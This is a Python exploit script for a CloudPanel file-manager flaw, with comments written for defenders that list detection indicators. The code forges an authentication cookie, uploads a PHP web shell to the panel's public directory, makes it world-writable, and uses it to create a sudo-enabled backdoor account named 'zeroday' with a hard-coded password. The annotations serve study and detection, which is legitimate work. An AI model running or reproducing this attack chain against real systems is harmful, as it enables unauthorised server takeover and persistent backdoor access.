import subprocess, argparse
import warnings ,os, sys
import ctypes, platform, requests
from colorama import Fore, Back, Style
from datetime import date
# Silence every Python warning for the rest of the run. This also hides the
# urllib3 certificate warnings that the verify=False requests would otherwise emit.
warnings.filterwarnings('ignore')
parser = argparse.ArgumentParser()

# Local helper command: Crypto.php is not part of this listing. Its stdout is
# used verbatim as the value of the `clp-fm` cookie.
cmd = '/usr/bin/php8.1 Crypto.php'
# URL prefix of the panel's file-manager component that every request targets.
default_path = '/file-manager/'
# Argument handed to Crypto.php when the second cookie is generated.
username = 'clp'
# Filled in from the command line by StartPage().
tgt = ''

# Post-compromise persistence commands. For responders these are the host-side
# indicators: a local account `zeroday` whose home base is /tmp, a password
# change for it, and its addition to the `sudo` group. The password is
# hard-coded and published with the script, so a host carrying this account
# is reachable by anyone who has read the page, not only by whoever ran it.
user_add = "useradd zeroday -s /bin/bash -b /tmp"
user_passwd = "echo 'Etharus@1337%0AEtharus@1337' | passwd zeroday"
user_mod = "usermod -aG sudo zeroday"
# Each command wrapped in `sudo su -c`; the quoting alternates so the inner
# single quotes of user_passwd survive.
gains = [
    f"sudo su -c '{user_add}'",
    f'sudo su -c "{user_passwd}"',
    f"sudo su -c '{user_mod}'",
]
def execPHP(txt=False):
    """Run the command held in the module-level ``cmd`` and return its stdout.

    Args:
        txt: Optional extra argument. When it is anything other than
            ``False`` it is appended to ``cmd`` after a single space.

    Returns:
        The child's standard output decoded as UTF-8.

    Note:
        The append is made to the *global* ``cmd``, so it persists: every
        later call sees the previously appended arguments as well. The
        command line is split on single spaces, so an argument containing
        a space becomes several argv entries. No shell is involved.
    """
    global cmd
    if False != txt:
        cmd = ' '.join((cmd, txt))
    argv = cmd.split(' ')
    child = subprocess.Popen(argv, stdout=subprocess.PIPE)
    return child.stdout.read().decode('utf-8')
def exploit():
    """Run the file-manager request chain against the host stored in ``tgt``.

    Reviewer annotation, written for defenders reading this listing. The
    visible code performs, in order:

    1. GET ``/file-manager/`` with a ``clp-fm`` cookie taken from the local
       Crypto.php helper (not shown). A 200 response is treated as
       "vulnerable"; anything else prints ``Not Vulnerable...``.
    2. POST ``/file-manager/backend/makefile`` to create ``shell.php`` under
       ``/htdocs/app/files/public/``.
    3. POST ``/file-manager/backend/text`` to write the contents of a local
       ``shell.php`` into that file.
    4. POST ``/file-manager/backend/permissions`` to set mode ``0777``.
    5. GET ``/shell.php``; on 200, send each entry of ``gains`` as the
       ``cmd`` query parameter.

    Detection: the request paths above, the ``clp-fm`` cookie on requests
    from clients that never logged in, a new ``shell.php`` in the panel's
    public directory, and the account-creation commands in ``gains`` are
    all observable in web access logs, file-integrity monitoring and
    host authentication/audit logs.

    Mitigation: the script's banner names CloudPanel versions 2.0.0 and
    2.3.0; confirm the fixed release against the vendor advisory, and do
    not expose the panel port to untrusted networks.

    Returns nothing; all results are printed.
    """
    global tgt,default_path,username
    # Every '/' is removed, so the argument must be a bare host[:port];
    # a pasted URL with a scheme would be mangled here.
    target = 'https://' + tgt.replace('/','')
    # Assigned but never read in the visible code.
    ipTarget = tgt.split(':')[0]
    # First cookie: Crypto.php run with no argument.
    crypto = execPHP()
    cookie = {'clp-fm':crypto}
    try:
        # Probe: the only "authentication" presented is the clp-fm cookie.
        # verify=False means the panel's TLS certificate is not validated.
        request = requests.get(target+default_path,cookies=cookie,verify=False,timeout=5)
        if request.status_code == 200:
            up_data = {'id':'/htdocs/app/files/public/','name':'shell.php'}
            # Second cookie: Crypto.php run with the `username` argument.
            # This call sits outside the inner try blocks, so a failure here
            # is reported by the outermost handler as 'Connection error!'.
            new_ck = {'clp-fm':execPHP(username)}
            try:
                # Step 2: create an empty file in the web-served directory.
                new_request = requests.post(target+default_path+'backend/makefile',cookies=new_ck,data=up_data,verify=False,timeout=5)
                if new_request.status_code == 200:
                    # Reads a local shell.php (not shown). The file handle is
                    # never closed, and a missing file is swallowed by the
                    # bare except below and misreported as a connection error.
                    cdata = {'id':'/htdocs/app/files/public/shell.php','content':open('shell.php','rb').read()}
                    try:
                        # Step 3: write the file body through the text-edit endpoint.
                        crequest = requests.post(target+default_path+'backend/text',cookies=new_ck,data=cdata,verify=False,timeout=5)
                        if crequest.status_code == 200:
                            pdata = {'id':'/htdocs/app/files/public/shell.php','permissions':'0777'}
                            try:
                                # Step 4: world-writable/executable mode; a 0777
                                # PHP file in a public directory is itself a
                                # strong file-integrity alert condition.
                                prequest = requests.post(target+default_path+'backend/permissions',cookies=new_ck,data=pdata,verify=False,timeout=5)
                                if prequest.status_code == 200:
                                    # Step 5: unauthenticated fetch of the uploaded file.
                                    shell_check = requests.get(target+'/shell.php',verify=False,timeout=5)
                                    if shell_check.status_code == 200:
                                        print(Style.BRIGHT + Fore.GREEN + '[+] WebShell : ' + target+'/shell.php')
                                        # The commands travel in the query string, so
                                        # they appear verbatim in the web server's
                                        # access log as /shell.php?cmd=... entries.
                                        # Responses are not checked; success is assumed.
                                        for gain in gains:
                                            requests.get(target+'/shell.php?cmd='+gain,verify=False,timeout=10)
                                        print(Style.BRIGHT + Fore.GREEN + '[+] SSH Login : user=zeroday,pass=Etharus@1337')
                            # Bare except: also covers the shell check and the
                            # command loop above, whatever the real error was.
                            except:
                                print(Style.BRIGHT + Fore.RED+'Connection error while changing permission!')
                    except:
                        print(Style.BRIGHT + Fore.RED+'Connection error while trying insert contents!')
            except:
                print(Style.BRIGHT + Fore.RED+'Connection error while trying creating file!')
        else:
            # Note: a non-200 answer at any later step prints nothing at all.
            print(Style.BRIGHT + Fore.RED+'Not Vulnerable...')
    except:
        print(Style.BRIGHT + Fore.RED+'Connection error!')
                
def StartPage():
    """Parse the command line, store the target in ``tgt`` and call exploit().

    The single required option is ``-T/--target``; its help text shows the
    expected form as ``host:port``. argparse exits the process itself when
    the option is missing.
    """
    global tgt, prt  # `prt` is declared here but never assigned in the visible code
    parser.add_argument(
        '-T', '--target',
        dest='tgt',
        type=str,
        required=True,
        default=None,
        help='Ex: 127.0.0.1:8443',
    )
    tgt = parser.parse_args().tgt
    exploit()
if __name__ == '__main__':
    # Date string used only for the terminal window title.
    today = date.today()
    d2 = today.strftime("%B %d, %Y")
    # Clear the screen and set the title; anything that is not Linux is
    # handled as Windows (ctypes.windll exists only there).
    if platform.system() != 'Linux':
        os.system('cls')
        ctypes.windll.kernel32.SetConsoleTitleW(f'CLP 0Day | {d2}')
    else:
        os.system('clear')
        sys.stdout.write("\x1b]2;CLP 0Day {}\x07".format(d2))
    # Banner. The version text in it is the only statement of affected
    # CloudPanel releases anywhere in this script.
    banner = f"""{Style.BRIGHT + Fore.GREEN}
                                ______      _____             _____ __   _          
                               / ____/___ _/ / (_)___  ____ _/ ___// /__(_)__  _____
                              / /_  / __ `/ / / / __ \/ __ `/\__ \/ //_/ / _ \/ ___/
                             / __/ / /_/ / / / / / / / /_/ /___/ / ,< / /  __(__  ) 
                            /_/    \__,_/_/_/_/_/ /_/\__, //____/_/|_/_/\___/____/  
                                                    /____/  CloudPanel 0day Version : 2.0.0 >= 2.3.0                        
                                                            
    {Style.BRIGHT + Fore.MAGENTA}
                                        ░█▀▄░█▀█░▀█▀░█▀█░█▀▀░█░█░░░░█▄█░█░█
                                        ░█░█░█▀█░░█░░█▀█░█░░░█▀▄░░░░█░█░░█░
                                        ░▀▀░░▀░▀░░▀░░▀░▀░▀▀▀░▀░▀░▀░░▀░▀░░▀░
    {Style.BRIGHT + Fore.WHITE}"""
    print(banner)
    StartPage()
                              
                        
                    
                
              
                
             
          
          